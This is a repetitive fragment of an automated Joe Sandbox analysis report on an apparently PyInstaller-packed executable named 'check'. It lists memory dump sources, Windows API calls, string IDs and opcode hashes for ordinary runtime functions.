                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                • Instruction ID: a331a67b6eeb87f67c1836f3448b901d75944cb3dd39e68ca235e08e8baf75e4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9731D873B18E8156E7509B66A8416EA6295BF94FE4F400532FE8DC3755EF3CE5468300
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                • String ID: Unhandled exception in script
                                                                                                                                                                                                                • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                • Opcode ID: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                                                                                                                                • Instruction ID: 7414f0aa635979c52f76639699c76c41cb7d4b7dd9e8673a55fa589328384dd8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56316272619E8189EB60DF61E8552F96364FF98BA4F440135FA4EC7B4ADF3CE1048700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF61E8E918F,?,00007FF61E8E3C55), ref: 00007FF61E8E2BA0
                                                                                                                                                                                                                • MessageBoxW.USER32 ref: 00007FF61E8E2C2A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentMessageProcess
                                                                                                                                                                                                                • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                • Instruction ID: d8d7fc6eca6d992851edba79f80808bfb913e4e5219934dba81a3b5772477c46
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3219F72B08F4182E7509B55B8447EA73A4EB98B90F800136FA8D9775AEF3CE605C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF61E8E1B99), ref: 00007FF61E8E2760
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                • Instruction ID: 948a595864ca67171133e41aecad7b99f77568016e85ec958921d44405bd7c2a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D221B272B18F8142E760DB51B8817EAA394FB98BA0F800135FE8DC3659EF7CE1458740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                • Instruction ID: e8379ccd92f6d26a6c832f64be98024833bb11c0c4e70873075963f0e7428445
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9BF0AF61A09F0681EB149B64A49433A2324AF64FB0F980635EA6EC62E5EF2CF044C300
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                • Instruction ID: c8fac2aa13aca62cd450a4bd1f83b8c49bb2d0064afcce14ef99269b4fee11c6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E3116032E5CE0659FA6411ADE4A13791058AFFAB70E8C0E34FE6ED66D78E6CF8414500
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,00007FF61E8FA5A3,?,?,00000000,00007FF61E8FA83E,?,?,?,?,?,00007FF61E8FA7CA), ref: 00007FF61E8FB3AF
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF61E8FA5A3,?,?,00000000,00007FF61E8FA83E,?,?,?,?,?,00007FF61E8FA7CA), ref: 00007FF61E8FB3CE
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF61E8FA5A3,?,?,00000000,00007FF61E8FA83E,?,?,?,?,?,00007FF61E8FA7CA), ref: 00007FF61E8FB3F6
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF61E8FA5A3,?,?,00000000,00007FF61E8FA83E,?,?,?,?,?,00007FF61E8FA7CA), ref: 00007FF61E8FB407
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF61E8FA5A3,?,?,00000000,00007FF61E8FA83E,?,?,?,?,?,00007FF61E8FA7CA), ref: 00007FF61E8FB418
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                • Opcode ID: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                                                                                                                                                • Instruction ID: 6f4df90a65aea1c870ac01b977b24a638896698e15bfa1707637a0e7e1eb101c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56116020F0CE4281FAD8A765A65127961915FB4FB0F488734F93EC6AD6DE2CF8428341
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                • Opcode ID: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                                                                                                                                                • Instruction ID: 35dfe4d51630ba208ba32a1e9a29eb9a49c258376a61ddb521e2fec2bd482687
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B110920E09E0785F9E8A3A144511BE21565FB5F70F188B34F93ECA6D3EE3CF8414251
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID: verbose
                                                                                                                                                                                                                • API String ID: 3215553584-579935070
                                                                                                                                                                                                                • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                • Instruction ID: a16c93308cf77f055ffa215b9e8b78f4a15258afaba92f8b297bd24e887fdc01
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9791CF32A08E4685F7A18E34D45037E36A5AB60FA8F544336EA5DC33D6DE3DF845A390
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                • Instruction ID: 6b26bf7c63baf9c4073363511f0c526d99fb4afe9a922121677999c07f769950
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA81B072E08E5285F7F6AF29811027836A0AB31FA8F554131FA09D7285DF2DF881D381
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                • Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                • Instruction ID: 008438083782c0a6071c008114130d4dbf46a73cc3edd42bbd57160ed46c93de
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B518032A19E028ADB948F2AD444A787395EBA4FA8F108534EE5E877C4DF7CF845C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                • Instruction ID: 91dbe31cad14ed3f3e1a9307f002f1b71938e8cd08d192e5e3d136e3d30f8511
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6618432908FC585E7619F16E4403AAB7A0FB95BA4F044625FB9C47799DF7CE194CB00
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                • Instruction ID: 63b4f16ff28530e1de604edcb70fa088aabb24af61380f082ff678e859e04ed9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66514F32A08F4286EBB48B26954426877A0EB65FA8F144136EA5D97BD5CF3CF491C701
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Message
                                                                                                                                                                                                                • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                • API String ID: 2030045667-255084403
                                                                                                                                                                                                                • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                • Instruction ID: c300adabd522330889ab90d1e8957d7b57fe3594c73d818123f99cd67bdda44f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E2219F72B08F4182E7509B55B4447EA73A4EB98B90F800536FA8DD375AEF3CE645C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2718003287-0
                                                                                                                                                                                                                • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                • Instruction ID: 7530f311fce1cb754cef2d52ad4efe1cb6e0136b7dd51d0b46a6b50e9a9232ae
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6CD11472B18E818AE754CF65D4402AC37B1FB64BA8B544236EE5ED7B89DE3CE116C304
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
